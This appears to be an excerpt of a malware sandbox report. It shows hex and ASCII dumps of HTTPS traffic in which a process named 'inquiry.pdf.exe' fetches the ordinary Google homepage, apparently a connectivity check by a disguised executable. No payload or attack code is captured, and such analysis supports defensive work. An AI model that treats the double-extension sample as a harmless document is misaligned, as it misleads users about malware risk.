                                                          2022-10-03 15:28:41 UTC47INData Raw: 72 73 5c 78 33 64 41 43 54 39 30 6f 47 64 72 64 51 4e 47 34 54 4b 39 4c 38 33 41 49 78 30 4a 2d 57 6e 78 46 54 73 44 77 2f 6d 5c 78 33 64 73 62 5f 68 65 2c 64 27 3b 0a 76 61 72 20 64 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 0a 76 61 72 20 67 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 67 3d 62 3d 3d 3d 68 3f 61 3a 22 22 7d 3b 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76 61 72 20 68 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 61 3d 75 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 61 29 3b 67 6f 6f 67 6c 65
                                                          Data Ascii: rs\x3dACT90oGdrdQNG4TK9L83AIx0J-WnxFTsDw/m\x3dsb_he,d';var d=this||self,e=function(a){return a};var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google
                                                          2022-10-03 15:28:41 UTC48INData Raw: 6d 74 6e 3a 30 2c 65 6e 64 3a 30 2c 69 6e 65 3a 66 61 6c 73 65 2c 69 6e 6a 73 3a 27 6e 6f 6e 65 27 2c 69 6e 6a 74 3a 30 2c 69 6e 6a 74 68 3a 30 2c 69 6e 6a 76 32 3a 66 61 6c 73 65 2c 6c 6c 73 3a 27 64 65 66 61 75 6c 74 27 2c 70 64 74 3a 30 2c 72 65 70 3a 30 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 64 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 73 62 5f 68 65 5c 78 32 32 3a 7b 5c 78 32 32 61 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 6c 69 65 6e 74 5c 78 32 32 3a 5c 78 32 32 68 65 69 72 6c 6f 6f 6d 2d 68 70 5c 78 32 32 2c 5c 78 32 32 64
                                                          Data Ascii: mtn:0,end:0,ine:false,injs:'none',injt:0,injth:0,injv2:false,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22d
                                                          2022-10-03 15:28:41 UTC49INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349705142.250.203.100443C:\Users\user\Desktop\inquiry.pdf.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-10-03 15:29:37 UTC49OUTGET / HTTP/1.1
                                                          Host: www.google.com
                                                          Connection: Keep-Alive
                                                          2022-10-03 15:29:37 UTC49INHTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:29:37 GMT
                                                          Expires: -1
                                                          Cache-Control: private, max-age=0
                                                          Content-Type: text/html; charset=ISO-8859-1
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Server: gws
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: AEC=AakniGNQ0aWHKSJGKGXe0DAAaOX4_l-Eqw_hG98LPGEupVNMiOM9qqjZAQ; expires=Sat, 01-Apr-2023 15:29:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                          Set-Cookie: __Secure-ENID=7.SE=kri9G_HeJvoxasZM26R6sYp7LSr9aDkO6S0wljZkHLvB8nbu3LtM50X119R__W1bVC6hiPtbrmCsYtdSG6Y_9MQoxbtdaa5dsDbfVsZw2lMX5H0R-CQIXVXImZIXyCIr5GdU7ZARDQvtSt5HaoY8vOSLxYMAaZ8QiTAjB_KInh0; expires=Fri, 03-Nov-2023 07:47:55 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                          Set-Cookie: CONSENT=PENDING+104; expires=Wed, 02-Oct-2024 15:29:37 GMT; path=/; domain=.google.com; Secure
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2022-10-03 15:29:37 UTC50INData Raw: 35 35 32 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b
                                                          Data Ascii: 552f<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html;
                                                          2022-10-03 15:29:37 UTC50INData Raw: 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 34 66 38 36 59 34 44 44 44 66 76 4b 31 73 51 50 39 4b 61 2d 2d 41 59 27 2c 6b 45
                                                          Data Ascii: charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="X_nNdRxgoWhPi3kp_PAp8A">(function(){window.google={kEI:'4f86Y4DDDfvK1sQP9Ka--AY',kE
                                                          2022-10-03 15:29:37 UTC51INData Raw: 36 34 2c 35 33 33 36 34 32 31 2c 36 39 39 2c 37 35 2c 31 36 2c 35 39 39 35 38 31 37 2c 31 36 2c 32 38 30 33 34 30 30 2c 33 33 31 31 2c 31 34 31 2c 37 39 35 2c 31 39 37 33 35 2c 31 2c 31 2c 33 34 36 2c 31 36 34 39 2c 35 2c 33 2c 33 2c 31 2c 31 2c 31 2c 39 30 2c 36 34 2c 31 33 2c 35 2c 35 2c 31 2c 33 2c 34 2c 37 34 35 31 37 37 36 2c 31 36 34 39 36 38 36 30 2c 34 37 30 2c 34 30 34 31 36 37 33 2c 31 39 36 34 2c 33 30 39 34 2c 31 33 35 37 39 2c 33 34 30 35 27 2c 6b 42 4c 3a 27 67 55 66 63 27 7d 3b 67 6f 6f 67 6c 65 2e 73 6e 3d 27 77 65 62 68 70 27 3b 67 6f 6f 67 6c 65 2e 6b 48 4c 3d 27 65 6e 2d 47 42 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63 74 69
                                                          Data Ascii: 64,5336421,699,75,16,5995817,16,2803400,3311,141,795,19735,1,1,346,1649,5,3,3,1,1,1,90,64,13,5,5,1,3,4,7451776,16496860,470,4041673,1964,3094,13579,3405',kBL:'gUfc'};google.sn='webhp';google.kHL='en-GB';})();(function(){var f=this||self;var h,k=[];functi
                                                          2022-10-03 15:29:37 UTC53INData Raw: 31 7d 3b 67 6f 6f 67 6c 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 5b 61 5d 2c 62 2c 63 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 67 6f 6f 67 6c 65 2e
                                                          Data Ascii: 1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.
                                                          2022-10-03 15:29:37 UTC54INData Raw: 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 30 7d 23 67 62 78 33 7b 6c 65 66 74 3a 30 7d 23 67 62 78 34 7b 72 69 67 68 74 3a 30 7d 23 67 62 62 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 62 77 7b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 33 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 74
                                                          Data Ascii: rder-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbt
                                                          2022-10-03 15:29:37 UTC55INData Raw: 6f 6c 69 64 20 64 61 73 68 65 64 20 64 61 73 68 65 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 33 70 78 20 33 70 78 20 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 70 78 3b 6c 65 66 74 3a 34 70 78 7d 23 67 62 7a 74 6d 73 31 2c 23 67 62 69 34 6d 31 2c 23 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d 63 2c
                                                          Data Ascii: olid dashed dashed;border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,
                                                          2022-10-03 15:29:37 UTC56INData Raw: 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 70 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 30 20 30 3b 2a 70
                                                          Data Ascii: ,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*p
                                                          2022-10-03 15:29:37 UTC58INData Raw: 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72
                                                          Data Ascii: iw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);backgr
                                                          2022-10-03 15:29:37 UTC59INData Raw: 30 6c 2c 2e 67 62 6d 30 6c 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d
                                                          Data Ascii: 0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbm
                                                          2022-10-03 15:29:37 UTC60INData Raw: 2e 67 62 6d 63 63 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 67 62 70 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 65 66 39 64 62 7d 2e 67 62 70 6d 63 20 2e 67 62 70 6d 74 63 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 7d 23 67 62 70 6d 7b 62 6f 72 64 65 72 3a 30 3b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 23 67 62 70 6d 20 2e 67 62 70 6d 74 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77
                                                          Data Ascii: .gbmcc{margin-top:5px}.gbpmc{background:#fef9db}.gbpmc .gbpmtc{padding:10px 20px}#gbpm{border:0;*border-collapse:collapse;border-spacing:0;margin:0;white-space:normal}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*w
                                                          2022-10-03 15:29:37 UTC61INData Raw: 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 3a 66 6f 63 75 73 2c 2e 67 62 71 66 62 61 3a 66 6f 63 75 73 2c 2e 67 62 71 66 62 62 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 64 39 30 66 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 35 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 35 29 3b 62 6f 78 2d 73 68 61 64 6f
                                                          Data Ascii: none !important;-moz-user-select:none;-webkit-user-select:none}.gbqfb:focus,.gbqfba:focus,.gbqfbb:focus{border:1px solid #4d90fe;-moz-box-shadow:inset 0 0 0 1px rgba(255, 255, 255, 0.5);-webkit-box-shadow:inset 0 0 0 1px rgba(255, 255, 255, 0.5);box-shado
                                                          2022-10-03 15:29:37 UTC62INData Raw: 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 34 37 38 37 65 64 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 34 64 39 30 66 65 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 34 37 38 37
                                                          Data Ascii: ound-image:-ms-linear-gradient(top,#4d90fe,#4787ed);background-image:-o-linear-gradient(top,#4d90fe,#4787ed);background-image:linear-gradient(top,#4d90fe,#4787ed);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#4d90fe',EndColorStr='#4787
                                                          2022-10-03 15:29:37 UTC64INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 35 66 35 66 35 2c 23 66 31 66 31 66 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 35 66 35 66 35 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d
                                                          Data Ascii: background-image:-ms-linear-gradient(top,#f5f5f5,#f1f1f1);background-image:-o-linear-gradient(top,#f5f5f5,#f1f1f1);background-image:linear-gradient(top,#f5f5f5,#f1f1f1);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#f5f5f5',EndColorStr=
                                                          2022-10-03 15:29:37 UTC65INData Raw: 3d 27 23 66 66 66 66 66 66 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 62 66 62 66 62 27 29 7d 2e 67 62 71 66 62 62 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 38 66 38 66 38 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 38 66 38 66 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c
                                                          Data Ascii: ='#ffffff',EndColorStr='#fbfbfb')}.gbqfbb-hvr,.gbqfbb-hvr:active{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#f8f8f8));background-image:-webkit-linear-gradient(top,#fff,#f8f8f8);background-image:-moz-l
                                                          2022-10-03 15:29:37 UTC66INData Raw: 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 73 62 20 2e 67 62 73 62 74 3a 61 66 74 65 72 2c 2e 67 62 73 62 20 2e 67 62 73 62 62 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 73 62 69 73 20 2e 67 62 73 62 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f
                                                          Data Ascii: (1,rgba(0,0,0,.1)));left:0;margin-right:0;opacity:0;position:absolute;width:100%}.gbsb .gbsbt:after,.gbsb .gbsbb:after{content:"";display:block;height:0;left:0;position:absolute;width:100%}.gbsbis .gbsbt{background:-webkit-gradient(linear,left top,left bo
                                                          2022-10-03 15:29:37 UTC67INData Raw: 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 34 70 78 7d 2e 67 62 73 62 20 2e 67 62 73 62 62 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 62 65 62 65 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 3b 62 6f 74 74 6f 6d 3a 30 7d 0a 3c 2f 73 74 79 6c 65 3e 3c 73
                                                          Data Ascii: und-image:-o-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));bottom:0;height:4px}.gbsb .gbsbb:after{border-bottom:1px solid #ebebeb;border-color:rgba(0,0,0,.3);bottom:0}</style><s
